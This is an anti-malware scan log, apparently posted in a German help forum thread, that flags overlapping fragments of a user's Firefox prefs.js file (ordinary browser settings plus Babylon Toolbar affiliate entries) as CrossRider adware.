<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>is file while the application is running,
 * the changes will be overwritten when the app</baddata><gooddata></gooddata><hash>5b7e871a7a11b185c4ff5b3fda2a10f0</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application ex</baddata><gooddata></gooddata><hash>e8f130716d1e1026a91a702a5ca89c64</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>le the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual</baddata><gooddata></gooddata><hash>a3368a17d9b2e74f665d9307a95b629e</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To mak</baddata><gooddata></gooddata><hash>bc1da5fce8a3bc7a9c272575e71d9f61</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>s file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update</baddata><gooddata></gooddata><hash>65748f12a1eab38311b217830df730d0</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-ba</baddata><gooddata></gooddata><hash>bd1cb7ea91fa5ed83c870991778d27d9</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>es, you can visit the URL about:config
 */
         

Alt 07.12.2015, 09:13   #9
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Teil 2

Code:
ATTFilter
user_pref(&quot;acces</baddata><gooddata></gooddata><hash>a7326b36ee9deb4b05bef5a5659f54ac</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>/* Do not edit this file.
 *
 * If you make changes to this file while</baddata><gooddata></gooddata><hash>a930d2cf197280b6853e9901bf45728e</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file </baddata><gooddata></gooddata><hash>29b0b5ec7b104ee8556eddbd0cf830d0</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>s

/* Do not edit this file.
 *
 * If you make changes to </baddata><gooddata></gooddata><hash>5683ffa24c3fe6507c470d8df90b42be</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
/* Do not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);</baddata><gooddata></gooddata><hash>01d8970ae5a6cb6b17aca0fa57adff01</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ctor&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;do</baddata><gooddata></gooddata><hash>99407031c1cac96d249f6337e81c5ca4</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> this file.
 *
 * If you make changes to this file while the applicat</baddata><gooddata></gooddata><hash>43966d347f0c8aac7152b0ea669e867a</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>t edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user</baddata><gooddata></gooddata><hash>88519b06dfacf83ee1e2e1b91be9f40c</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonTo</baddata><gooddata></gooddata><hash>41988021d4b72d096c5726744fb56b95</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>f you make changes to this file while the application is running,
 * the cha</baddata><gooddata></gooddata><hash>22b7475a64275adcba0995050cf849b7</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
